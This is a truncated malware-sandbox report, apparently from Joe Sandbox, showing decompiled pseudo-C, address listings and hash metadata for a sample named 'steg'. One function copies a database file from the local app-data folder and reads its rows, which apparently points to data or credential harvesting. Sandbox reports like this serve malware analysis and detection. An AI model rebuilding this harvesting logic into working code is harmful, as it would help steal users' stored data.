						 *(_t148 + 0x22) =  *(_t148 + 0x22) | 0x00000001;
					}
					_t203 =  *((intOrPtr*)(_t230 + 8));
					_v36 = _t203;
					if( *((intOrPtr*)(_t203 + _v32 + 4)) != 0) {
						_t150 = E00FC91B7(0xd8);
						_t236 = _t235 + 4;
						_v44 = _t150;
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 = 7;
							L57:
							 *((char*)(_t230 + 0x1e)) = 1;
						} else {
							E00FE7C87(_t150, 0, 0xd8);
							E00FB9DF7( *((intOrPtr*)(_t203 + _v32 + 4)));
							_t204 = E00FB99B7(__eflags,  *((intOrPtr*)(_t203 + _v32 + 4)), 1, 0, 0, _v44);
							_t237 = _t236 + 0x24;
							__eflags = _t204 - 0x10;
							_t202 =  ==  ? 0 : _t204;
							_t227 = 0;
							__eflags = _t202;
							if(_t202 != 0) {
								L15:
								_t156 = _t202 & 0x000000ff;
								__eflags = _t156 - 0x1a;
								if(__eflags > 0) {
									L17:
									_t157 = 0x478e40;
								} else {
									_t157 =  *(0x475478 + _t156 * 4);
									__eflags =  *(0x475478 + _t156 * 4);
									if(__eflags == 0) {
										goto L17;
									}
								}
								E00FD1157(__eflags, _v56, _t230, 0x470310, _t157);
								_t238 = _t237 + 0x10;
								goto L19;
							} else {
								_t165 =  &_v28;
								_v60 =  &_v28;
								while(1) {
									__eflags = _t227 - 5;
									if(_t227 >= 5) {
										break;
									}
									_t227 = _t227 + 1;
									_t202 = E00FBA177(_v32,  *((intOrPtr*)(_v36 + _v32 + 4)), _t227, _t165);
									_t165 = _v60 + 4;
									_t237 = _t237 + 0xc;
									_v60 = _v60 + 4;
									__eflags = _t202;
									if(_t202 == 0) {
										continue;
									} else {
										goto L15;
									}
									goto L20;
								}
								__eflags = _t202;
								if(_t202 != 0) {
									goto L15;
								} else {
									_t224 = _v36;
									_t228 = _v32;
									_t205 = _v40;
									 *((intOrPtr*)( *((intOrPtr*)(_t224 + _t228 + 0xc)))) = _v28;
									_t213 = _v12;
									__eflags = _t213;
									if(_t213 == 0) {
										_t168 =  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc));
										_t84 = _t168 + 0x3a;
										 *_t84 =  *(_t168 + 0x3a) | 0x00000004;
										__eflags =  *_t84;
										goto L36;
									} else {
										__eflags = _t205;
										if(_t205 != 0) {
											__eflags = _t213 - ( *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39) & 0x000000ff);
											if(__eflags == 0) {
												goto L36;
											} else {
												_push(0x477218);
												goto L34;
											}
										} else {
											_t220 =  ==  ? 1 : _t213 & 3;
											 *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39) =  ==  ? 1 : _t213 & 3;
											_t195 = E00FA7147(_t230, 0x47812c, _t205);
											_t224 = _v36;
											_t237 = _t237 + 0xc;
											 *((intOrPtr*)(_t230 + 0x2c)) = _t195;
											L36:
											 *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x39)) =  *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39);
											_t215 =  *((intOrPtr*)(_t224 + _t228 + 0xc));
											__eflags =  *(_t215 + 0x3c);
											if( *(_t215 + 0x3c) == 0) {
												_t95 =  &_v20; // 0x475844
												_t186 =  *_t95;
												__eflags = _t186;
												if(__eflags != 0) {
													if(__eflags < 0) {
														_t186 =  ~_t186;
													}
												} else {
													_t186 = 0x7d0;
												}
												 *(_t215 + 0x3c) = _t186;
												E00FBC3F7( *((intOrPtr*)(_t224 + _t228 + 4)),  *((intOrPtr*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x3c)));
												_t224 = _v36;
												_t237 = _t237 + 8;
											}
											_t216 = _v24;
											 *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x38)) = _t216;
											_t173 =  *((intOrPtr*)(_t224 + _t228 + 0xc));
											__eflags =  *((char*)(_t173 + 0x38));
											if( *((char*)(_t173 + 0x38)) == 0) {
												 *((char*)(_t173 + 0x38)) = 1;
											}
											__eflags =  *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x38)) - 4;
											if(__eflags <= 0) {
												__eflags = _t205;
												if(_t205 == 0) {
													__eflags = _t216 - 4;
													if(_t216 >= 4) {
														_t114 = _t230 + 0xc;
														 *_t114 =  *(_t230 + 0xc) & 0xffff7fff;
														__eflags =  *_t114;
													}
												}
												_push(_v48);
												_t176 = E00FC9197(_t230, 0x47814c,  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228)));
												_t217 =  &_v76;
												 *(_v52 + 0xf0) = 0;
												_t206 = E00F953F7(_v52, _t176, 0x43c930,  &_v76, 0);
												_t179 = _v52;
												 *((intOrPtr*)(_t179 + 0xf0)) =  *((intOrPtr*)(_t230 + 0xf0));
												_t230 = _t179;
												__eflags = _t206;
												_t202 =  ==  ? _v64 : _t206;
												E00FBE6D7(_t230, _t176);
												_t238 = _t237 + 0x2c;
												__eflags = _t202;
												if(_t202 == 0) {
													E00FB70E7(_t230, _v40);
													_t238 = _t238 + 8;
												}
												__eflags =  *((char*)(_t230 + 0x1e));
												if( *((char*)(_t230 + 0x1e)) == 0) {
													__eflags = _t202;
													if(_t202 == 0) {
														goto L55;
													} else {
														goto L54;
													}
												} else {
													_t202 = 7;
													E00FCE577(_t217, _t230, 0);
													_t238 = _t238 + 8;
													L54:
													__eflags =  *(_t230 + 0xc) & 0x00040000;
													if(( *(_t230 + 0xc) & 0x00040000) == 0) {
														L19:
														_t228 = _v32;
													} else {
														L55:
														_t228 = _v32;
														 *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc)) + 0x3a) =  *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc)) + 0x3a) | 0x00000001;
														_t202 = 0;
													}
													goto L20;
												}
											} else {
												_push(0x478134);
												L34:
												_push(_t230);
												_push(_v56);
												E00FD1157(__eflags);
												_t238 = _t237 + 0xc;
												_t202 = 1;
												goto L20;
											}
										}
									}
								}
								goto L58;
							}
							L20:
							E00FB9317(_v44);
							E00F97247(_v44);
							_t225 =  *(_v36 + _t228 + 4);
							__eflags =  *((char*)(_t225 + 9));
							if( *((char*)(_t225 + 9)) != 0) {
								_t60 = _t225 + 0xc;
								 *_t60 =  *(_t225 + 0xc) - 1;
								__eflags =  *_t60;
								if( *_t60 == 0) {
									_t163 =  *( *((intOrPtr*)(_t225 + 4)) + 0x30);
									__eflags = _t163;
									if(_t163 != 0) {
										 *0x481858(_t163);
									}
									 *((char*)(_t225 + 0xa)) = 0;
								}
							}
							goto L25;
						}
						L58:
						__eflags = _v8 ^ _t232;
						return E00FE72F2(_t202, _t202, _v8 ^ _t232, _t224, _t225, _t230);
					} else {
						if(_t225 == 1) {
							 *( *((intOrPtr*)(_t203 + 0x1c)) + 0x3a) =  *( *((intOrPtr*)(_t203 + 0x1c)) + 0x3a) | _t225;
						}
						return E00FE72F2(0, _t203, _v8 ^ _t232, _t224, _t225, _t230);
					}
				}
			}
























































                                                                                                                    0x00fc7274
                                                                                                                    0x00fc7277
                                                                                                                    0x00fc727c
                                                                                                                    0x00fc7280
                                                                                                                    0x00fc7283
                                                                                                                    0x00fc7286
                                                                                                                    0x00fc7289
                                                                                                                    0x00fc728f
                                                                                                                    0x00fc729d
                                                                                                                    0x00fc72a2
                                                                                                                    0x00fc7291
                                                                                                                    0x00fc7291
                                                                                                                    0x00fc7296
                                                                                                                    0x00fc7296
                                                                                                                    0x00fc72a7
                                                                                                                    0x00fc72aa
                                                                                                                    0x00fc72b6
                                                                                                                    0x00fc72b9
                                                                                                                    0x00fc72bc
                                                                                                                    0x00fc72c3
                                                                                                                    0x00fc72ca
                                                                                                                    0x00fc72cd
                                                                                                                    0x00fc72d0
                                                                                                                    0x00fc72d7
                                                                                                                    0x00fc72da
                                                                                                                    0x00fc72df
                                                                                                                    0x00fc72e2
                                                                                                                    0x00fc72e7
                                                                                                                    0x00fc7435
                                                                                                                    0x00fc7435
                                                                                                                    0x00fc7438
                                                                                                                    0x00000000
                                                                                                                    0x00fc743e
                                                                                                                    0x00fc743e
                                                                                                                    0x00fc7444
                                                                                                                    0x00000000
                                                                                                                    0x00fc744a
                                                                                                                    0x00fc7444
                                                                                                                    0x00000000
                                                                                                                    0x00fc72ed
                                                                                                                    0x00fc72f5
                                                                                                                    0x00fc72ff
                                                                                                                    0x00fc7304
                                                                                                                    0x00fc7309
                                                                                                                    0x00fc730b
                                                                                                                    0x00fc730b
                                                                                                                    0x00fc730f
                                                                                                                    0x00fc7315
                                                                                                                    0x00fc731d
                                                                                                                    0x00fc7343
                                                                                                                    0x00fc7348
                                                                                                                    0x00fc734b
                                                                                                                    0x00fc734e
                                                                                                                    0x00fc7350
                                                                                                                    0x00fc75ff
                                                                                                                    0x00fc7604
                                                                                                                    0x00fc7604
                                                                                                                    0x00fc7356
                                                                                                                    0x00fc735e
                                                                                                                    0x00fc736a
                                                                                                                    0x00fc7381
                                                                                                                    0x00fc7385
                                                                                                                    0x00fc7388
                                                                                                                    0x00fc738b
                                                                                                                    0x00fc738e
                                                                                                                    0x00fc7390
                                                                                                                    0x00fc7392
                                                                                                                    0x00fc73c7
                                                                                                                    0x00fc73c9
                                                                                                                    0x00fc73ce
                                                                                                                    0x00fc73d1
                                                                                                                    0x00fc73de
                                                                                                                    0x00fc73de
                                                                                                                    0x00fc73d3
                                                                                                                    0x00fc73d3
                                                                                                                    0x00fc73da
                                                                                                                    0x00fc73dc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc73dc
                                                                                                                    0x00fc73ed
                                                                                                                    0x00fc73f2
                                                                                                                    0x00000000
                                                                                                                    0x00fc7394
                                                                                                                    0x00fc7394
                                                                                                                    0x00fc7397
                                                                                                                    0x00fc739a
                                                                                                                    0x00fc739a
                                                                                                                    0x00fc739d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc73aa
                                                                                                                    0x00fc73b5
                                                                                                                    0x00fc73ba
                                                                                                                    0x00fc73bd
                                                                                                                    0x00fc73c0
                                                                                                                    0x00fc73c3
                                                                                                                    0x00fc73c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc73c5
                                                                                                                    0x00fc744f
                                                                                                                    0x00fc7451
                                                                                                                    0x00000000
                                                                                                                    0x00fc7457
                                                                                                                    0x00fc7457
                                                                                                                    0x00fc745a
                                                                                                                    0x00fc7464
                                                                                                                    0x00fc7467
                                                                                                                    0x00fc7469
                                                                                                                    0x00fc746c
                                                                                                                    0x00fc746e
                                                                                                                    0x00fc74ce
                                                                                                                    0x00fc74d2
                                                                                                                    0x00fc74d2
                                                                                                                    0x00fc74d2
                                                                                                                    0x00000000
                                                                                                                    0x00fc7470
                                                                                                                    0x00fc7470
                                                                                                                    0x00fc7472
                                                                                                                    0x00fc74ac
                                                                                                                    0x00fc74ae
                                                                                                                    0x00000000
                                                                                                                    0x00fc74b0
                                                                                                                    0x00fc74b0
                                                                                                                    0x00000000
                                                                                                                    0x00fc74b0
                                                                                                                    0x00fc7474
                                                                                                                    0x00fc747f
                                                                                                                    0x00fc748f
                                                                                                                    0x00fc7492
                                                                                                                    0x00fc7497
                                                                                                                    0x00fc749a
                                                                                                                    0x00fc749d
                                                                                                                    0x00fc74d7
                                                                                                                    0x00fc74e4
                                                                                                                    0x00fc74e7
                                                                                                                    0x00fc74eb
                                                                                                                    0x00fc74ef
                                                                                                                    0x00fc74f1
                                                                                                                    0x00fc74f1
                                                                                                                    0x00fc74f4
                                                                                                                    0x00fc74f6
                                                                                                                    0x00fc74ff
                                                                                                                    0x00fc7501
                                                                                                                    0x00fc7501
                                                                                                                    0x00fc74f8
                                                                                                                    0x00fc74f8
                                                                                                                    0x00fc74f8
                                                                                                                    0x00fc7503
                                                                                                                    0x00fc7511
                                                                                                                    0x00fc7516
                                                                                                                    0x00fc7519
                                                                                                                    0x00fc7519
                                                                                                                    0x00fc7520
                                                                                                                    0x00fc7523
                                                                                                                    0x00fc7526
                                                                                                                    0x00fc752a
                                                                                                                    0x00fc752e
                                                                                                                    0x00fc7530
                                                                                                                    0x00fc7530
                                                                                                                    0x00fc7538
                                                                                                                    0x00fc753c
                                                                                                                    0x00fc7548
                                                                                                                    0x00fc754a
                                                                                                                    0x00fc754c
                                                                                                                    0x00fc754f
                                                                                                                    0x00fc7551
                                                                                                                    0x00fc7551
                                                                                                                    0x00fc7551
                                                                                                                    0x00fc7551
                                                                                                                    0x00fc754f
                                                                                                                    0x00fc7558
                                                                                                                    0x00fc7567
                                                                                                                    0x00fc7574
                                                                                                                    0x00fc7584
                                                                                                                    0x00fc7593
                                                                                                                    0x00fc7595
                                                                                                                    0x00fc7599
                                                                                                                    0x00fc759f
                                                                                                                    0x00fc75a1
                                                                                                                    0x00fc75a3
                                                                                                                    0x00fc75a8
                                                                                                                    0x00fc75ad
                                                                                                                    0x00fc75b0
                                                                                                                    0x00fc75b2
                                                                                                                    0x00fc75b8
                                                                                                                    0x00fc75bd
                                                                                                                    0x00fc75bd
                                                                                                                    0x00fc75c0
                                                                                                                    0x00fc75c4
                                                                                                                    0x00fc75d8
                                                                                                                    0x00fc75da
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc75c6
                                                                                                                    0x00fc75c9
                                                                                                                    0x00fc75ce
                                                                                                                    0x00fc75d3
                                                                                                                    0x00fc75dc
                                                                                                                    0x00fc75dc
                                                                                                                    0x00fc75e3
                                                                                                                    0x00fc73f5
                                                                                                                    0x00fc73f5
                                                                                                                    0x00fc75e9
                                                                                                                    0x00fc75e9
                                                                                                                    0x00fc75ec
                                                                                                                    0x00fc75f3
                                                                                                                    0x00fc75f8
                                                                                                                    0x00fc75f8
                                                                                                                    0x00000000
                                                                                                                    0x00fc75e3
                                                                                                                    0x00fc753e
                                                                                                                    0x00fc753e
                                                                                                                    0x00fc74b5
                                                                                                                    0x00fc74b5
                                                                                                                    0x00fc74b6
                                                                                                                    0x00fc74b9
                                                                                                                    0x00fc74be
                                                                                                                    0x00fc74c1
                                                                                                                    0x00000000
                                                                                                                    0x00fc74c1
                                                                                                                    0x00fc753c
                                                                                                                    0x00fc7472
                                                                                                                    0x00fc746e
                                                                                                                    0x00000000
                                                                                                                    0x00fc7451
                                                                                                                    0x00fc73f8
                                                                                                                    0x00fc73fb
                                                                                                                    0x00fc7403
                                                                                                                    0x00fc740e
                                                                                                                    0x00fc7412
                                                                                                                    0x00fc7416
                                                                                                                    0x00fc7418
                                                                                                                    0x00fc7418
                                                                                                                    0x00fc7418
                                                                                                                    0x00fc741b
                                                                                                                    0x00fc7420
                                                                                                                    0x00fc7423
                                                                                                                    0x00fc7425
                                                                                                                    0x00fc7428
                                                                                                                    0x00fc742e
                                                                                                                    0x00fc7431
                                                                                                                    0x00fc7431
                                                                                                                    0x00fc741b
                                                                                                                    0x00000000
                                                                                                                    0x00fc7416
                                                                                                                    0x00fc7608
                                                                                                                    0x00fc760f
                                                                                                                    0x00fc761a
                                                                                                                    0x00fc731f
                                                                                                                    0x00fc7322
                                                                                                                    0x00fc7327
                                                                                                                    0x00fc7327
                                                                                                                    0x00fc733d
                                                                                                                    0x00fc733d
                                                                                                                    0x00fc731d

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: ($G$DXG
                                                                                                                    • API String ID: 2102423945-3586749926
                                                                                                                    • Opcode ID: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction ID: 3fb64d9df0a82f68cc491f94cdd5f622ad65e71ea1d471dc2993b024f8fcc60e
                                                                                                                    • Opcode Fuzzy Hash: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction Fuzzy Hash: 16C1A271E083469FDB10EF99C982FADBBB5AF04324F04806DE909A7652D775E840EF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8CCF7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 291COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00F8CCF7(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v125;
				char _v126;
				short _v128;
				char _v136;
				void _v188;
				char _v708;
				char _v827;
				char _v828;
				char _v836;
				char _v1092;
				char _v2092;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v4664;
				char _v4668;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t91;
				intOrPtr _t95;
				void* _t102;
				char* _t111;
				intOrPtr _t112;
				void* _t115;
				void* _t122;
				void* _t124;
				intOrPtr _t136;
				void* _t148;
				intOrPtr _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t158;
				intOrPtr* _t161;
				intOrPtr* _t164;
				void* _t168;
				void* _t173;
				void* _t175;
				void* _t178;
				void* _t179;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t195;

				_t168 = __edx;
				E00FE7307(0x1238);
				_v8 =  *0x481f80 ^ _t180;
				asm("movq xmm0, [0x470728]");
				_v828 =  *0x470730 & 0x000000ff;
				asm("movq [ebp-0x340], xmm0");
				E00FE7C87( &_v827, 0, 0x77);
				asm("movq xmm0, [0x470734]");
				_v128 =  *0x47073c;
				_v126 =  *0x47073e & 0x000000ff;
				asm("movq [ebp-0x84], xmm0");
				E00FE7C87( &_v125, 0, 0x75);
				_t151 = _a4;
				_t177 = 0x470740;
				memcpy( &_v188, 0x470740, 0xc << 2);
				_t183 = _t181 + 0x24;
				_v4668 = 0;
				_v4664 = 0;
				asm("movsw");
				if(_t151 != 0xe) {
					if(_t151 != 0xd) {
						if(_t151 != 0x10) {
							if(_t151 != 0x11) {
								_push(0x47082c);
							} else {
								_push(0x47080c);
							}
						} else {
							_push(0x4707e8);
						}
					} else {
						_push(0x4707c0);
					}
				} else {
					_push(0x470794);
				}
				_push(0x100);
				_push( &_v1092);
				E00FE7AF9();
				_t184 = _t183 + 0xc;
				_push( &_v708);
				_push(0);
				_push(0);
				_push(0x1c);
				_push(0);
				if( *0x470200() < 0) {
					L35:
					_pop(_t173);
					_pop(_t178);
					_pop(_t152);
					return E00FE72F2(_t85, _t152, _v8 ^ _t180, _t168, _t173, _t178);
				} else {
					E00FE7B4E( &_v708, 0x208,  &_v1092);
					_t91 = E00F8BD87( &_v708);
					_t185 = _t184 + 0x10;
					if(_t91 != 0) {
						E00FE7AF9( &_v2612, 0x208,  &_v708);
						_t158 =  &_v708;
						_t186 = _t185 + 0xc;
						_t168 = _t158 + 1;
						do {
							_t95 =  *_t158;
							_t158 = _t158 + 1;
						} while (_t95 != 0);
						if( *((char*)(_t180 + _t158 - _t168 - 0x2c1)) != 0x5c) {
							E00FE7B4E( &_v708, 0x208, 0x470790);
							E00FE7B4E( &_v708, 0x208,  &_v136);
							_t187 = _t186 + 0x18;
						} else {
							E00FE7B4E( &_v708, 0x208,  &_v136);
							_t187 = _t186 + 0xc;
						}
						_t102 = E00F8BDA7( &_v708);
						_t188 = _t187 + 4;
						if(_t102 == 0) {
							E00FE7AF9( &_v708, 0x208,  &_v2612);
							E00FE7AF9( &_v136, 0x80,  &_v836);
							_t164 =  &_v708;
							_t195 = _t188 + 0x18;
							_t168 = _t164 + 1;
							do {
								_t136 =  *_t164;
								_t164 = _t164 + 1;
							} while (_t136 != 0);
							if( *((char*)(_t180 + _t164 - _t168 - 0x2c1)) != 0x5c) {
								E00FE7B4E( &_v708, 0x208, 0x470790);
								E00FE7B4E( &_v708, 0x208,  &_v136);
								_t188 = _t195 + 0x18;
							} else {
								E00FE7B4E( &_v708, 0x208,  &_v136);
								_t188 = _t195 + 0xc;
							}
						}
						 *0x4700e8(0x3e8,  &_v2092);
						E00FE7B4E( &_v2092, 0x3e8,  &_v136);
						_t189 = _t188 + 0xc;
						_push(0);
						_push( &_v2092);
						_push( &_v708);
						if( *0x4700a4() != 0) {
							_t111 =  &_v2092;
						} else {
							 *0x470124();
							_t111 =  &_v708;
						}
						_push(0);
						_push(1);
						_t85 = E00F97A57(_t111,  &_v4668);
						_t190 = _t189 + 0x10;
						if(_t85 == 0) {
							_t161 =  &_v188;
							_t168 = _t161 + 1;
							do {
								_t112 =  *_t161;
								_t161 = _t161 + 1;
							} while (_t112 != 0);
							_t85 = E00F97D07(_v4668,  &_v188, _t161 - _t168,  &_v4664, 0);
							_t191 = _t190 + 0x14;
							if(_t85 == 0) {
								_t85 = _v4664;
								if(_v4664 != 0) {
									_t115 = E00F98C87(_t85);
									_t192 = _t191 + 4;
									if(_t115 != 0x65) {
										while(_t115 == 0x64) {
											E00FE7AF9( &_v4660, 0x400, E00F991D7(_v4664, 1));
											_t122 = E00F991D7(_v4664, 3);
											_t177 = E00F98DE7(_v4664, 5);
											_t124 = E00F98EF7(_v4664, 5);
											_push(0x400);
											E00F8BEF7(_t123, _t124,  &_v3636);
											E00F8EF07(_t151,  &_v4660, _t122,  &_v3636);
											_t115 = E00F98C87(_v4664);
											_t192 = _t192 + 0x50;
											if(_t115 != 0x65) {
												continue;
											}
											goto L34;
										}
									}
									L34:
									E00F99387(_v4664);
									E00F94A77(_t151, _t177, _v4668);
									_t85 =  *0x4700e4( &_v2092);
								}
							}
						}
						goto L35;
					} else {
						_t148 =  *0x470124();
						_pop(_t175);
						_pop(_t179);
						_pop(_t153);
						return E00FE72F2(_t148, _t153, _v8 ^ _t180, _t168, _t175, _t179);
					}
				}
			}

























































                                                                                                                    0x00f8ccf7
                                                                                                                    0x00f8ccff
                                                                                                                    0x00f8cd0b
                                                                                                                    0x00f8cd15
                                                                                                                    0x00f8cd22
                                                                                                                    0x00f8cd31
                                                                                                                    0x00f8cd39
                                                                                                                    0x00f8cd44
                                                                                                                    0x00f8cd4c
                                                                                                                    0x00f8cd59
                                                                                                                    0x00f8cd62
                                                                                                                    0x00f8cd6a
                                                                                                                    0x00f8cd6f
                                                                                                                    0x00f8cd77
                                                                                                                    0x00f8cd82
                                                                                                                    0x00f8cd84
                                                                                                                    0x00f8cd87
                                                                                                                    0x00f8cd91
                                                                                                                    0x00f8cd9b
                                                                                                                    0x00f8cda0
                                                                                                                    0x00f8cdac
                                                                                                                    0x00f8cdb8
                                                                                                                    0x00f8cdc4
                                                                                                                    0x00f8cdcd
                                                                                                                    0x00f8cdc6
                                                                                                                    0x00f8cdc6
                                                                                                                    0x00f8cdc6
                                                                                                                    0x00f8cdba
                                                                                                                    0x00f8cdba
                                                                                                                    0x00f8cdba
                                                                                                                    0x00f8cdae
                                                                                                                    0x00f8cdae
                                                                                                                    0x00f8cdae
                                                                                                                    0x00f8cda2
                                                                                                                    0x00f8cda2
                                                                                                                    0x00f8cda2
                                                                                                                    0x00f8cdd8
                                                                                                                    0x00f8cddd
                                                                                                                    0x00f8cdde
                                                                                                                    0x00f8cde3
                                                                                                                    0x00f8cdec
                                                                                                                    0x00f8cded
                                                                                                                    0x00f8cdef
                                                                                                                    0x00f8cdf1
                                                                                                                    0x00f8cdf3
                                                                                                                    0x00f8cdfd
                                                                                                                    0x00f8d109
                                                                                                                    0x00f8d10c
                                                                                                                    0x00f8d10d
                                                                                                                    0x00f8d110
                                                                                                                    0x00f8d119
                                                                                                                    0x00f8ce03
                                                                                                                    0x00f8ce16
                                                                                                                    0x00f8ce22
                                                                                                                    0x00f8ce27
                                                                                                                    0x00f8ce2c
                                                                                                                    0x00f8ce58
                                                                                                                    0x00f8ce5d
                                                                                                                    0x00f8ce63
                                                                                                                    0x00f8ce66
                                                                                                                    0x00f8ce69
                                                                                                                    0x00f8ce69
                                                                                                                    0x00f8ce6b
                                                                                                                    0x00f8ce6c
                                                                                                                    0x00f8ce7a
                                                                                                                    0x00f8ceaa
                                                                                                                    0x00f8cec2
                                                                                                                    0x00f8cec7
                                                                                                                    0x00f8ce7c
                                                                                                                    0x00f8ce8f
                                                                                                                    0x00f8ce94
                                                                                                                    0x00f8ce94
                                                                                                                    0x00f8ced1
                                                                                                                    0x00f8ced6
                                                                                                                    0x00f8cedb
                                                                                                                    0x00f8cef4
                                                                                                                    0x00f8cf0c
                                                                                                                    0x00f8cf11
                                                                                                                    0x00f8cf17
                                                                                                                    0x00f8cf1a
                                                                                                                    0x00f8cf1d
                                                                                                                    0x00f8cf1d
                                                                                                                    0x00f8cf1f
                                                                                                                    0x00f8cf20
                                                                                                                    0x00f8cf2e
                                                                                                                    0x00f8cf5e
                                                                                                                    0x00f8cf76
                                                                                                                    0x00f8cf7b
                                                                                                                    0x00f8cf30
                                                                                                                    0x00f8cf43
                                                                                                                    0x00f8cf48
                                                                                                                    0x00f8cf48
                                                                                                                    0x00f8cf2e
                                                                                                                    0x00f8cf8a
                                                                                                                    0x00f8cfa3
                                                                                                                    0x00f8cfa8
                                                                                                                    0x00f8cfb1
                                                                                                                    0x00f8cfb3
                                                                                                                    0x00f8cfba
                                                                                                                    0x00f8cfc3
                                                                                                                    0x00f8cfd3
                                                                                                                    0x00f8cfc5
                                                                                                                    0x00f8cfc5
                                                                                                                    0x00f8cfcb
                                                                                                                    0x00f8cfcb
                                                                                                                    0x00f8cfd9
                                                                                                                    0x00f8cfdb
                                                                                                                    0x00f8cfe5
                                                                                                                    0x00f8cfea
                                                                                                                    0x00f8cfef
                                                                                                                    0x00f8cff5
                                                                                                                    0x00f8cffb
                                                                                                                    0x00f8cffe
                                                                                                                    0x00f8cffe
                                                                                                                    0x00f8d000
                                                                                                                    0x00f8d001
                                                                                                                    0x00f8d01e
                                                                                                                    0x00f8d023
                                                                                                                    0x00f8d028
                                                                                                                    0x00f8d02e
                                                                                                                    0x00f8d036
                                                                                                                    0x00f8d03d
                                                                                                                    0x00f8d042
                                                                                                                    0x00f8d048
                                                                                                                    0x00f8d04e
                                                                                                                    0x00f8d071
                                                                                                                    0x00f8d07e
                                                                                                                    0x00f8d09a
                                                                                                                    0x00f8d09c
                                                                                                                    0x00f8d0a1
                                                                                                                    0x00f8d0af
                                                                                                                    0x00f8d0c4
                                                                                                                    0x00f8d0d2
                                                                                                                    0x00f8d0d7
                                                                                                                    0x00f8d0dd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8d0dd
                                                                                                                    0x00f8d04e
                                                                                                                    0x00f8d0e3
                                                                                                                    0x00f8d0e9
                                                                                                                    0x00f8d0f4
                                                                                                                    0x00f8d103
                                                                                                                    0x00f8d103
                                                                                                                    0x00f8d036
                                                                                                                    0x00f8d028
                                                                                                                    0x00000000
                                                                                                                    0x00f8ce2e
                                                                                                                    0x00f8ce2e
                                                                                                                    0x00f8ce34
                                                                                                                    0x00f8ce35
                                                                                                                    0x00f8ce36
                                                                                                                    0x00f8ce44
                                                                                                                    0x00f8ce44
                                                                                                                    0x00f8ce2c

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 2102423945-2967466578
                                                                                                                    • Opcode ID: 5ec17c61c1a874cfab6727c3c777990b3906f84e8775343c72e1e09b33feb76d
                                                                                                                    • Instruction ID: b8cf0a3d8b51e31d1b23e9f0cca52607beabe00fdd849479bb00c69d497ca679
                                                                                                                    • Opcode Fuzzy Hash: 5ec17c61c1a874cfab6727c3c777990b3906f84e8775343c72e1e09b33feb76d
                                                                                                                    • Instruction Fuzzy Hash: 6CA15272D41258AAEF20FB60CC46FED777CAF14700F0441E5F609E6081EA79AB949FA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FA6D37 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00FA6D37(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, unsigned int _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a28, unsigned int _a32, signed int* _a36) {
				unsigned int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				unsigned int _v20;
				void* _v24;
				char _v28;
				signed int _v32;
				signed short _v34;
				signed short _v36;
				signed short _v38;
				char _v64;
				void* __edi;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t132;
				intOrPtr _t138;
				intOrPtr _t148;
				void* _t166;
				void* _t172;
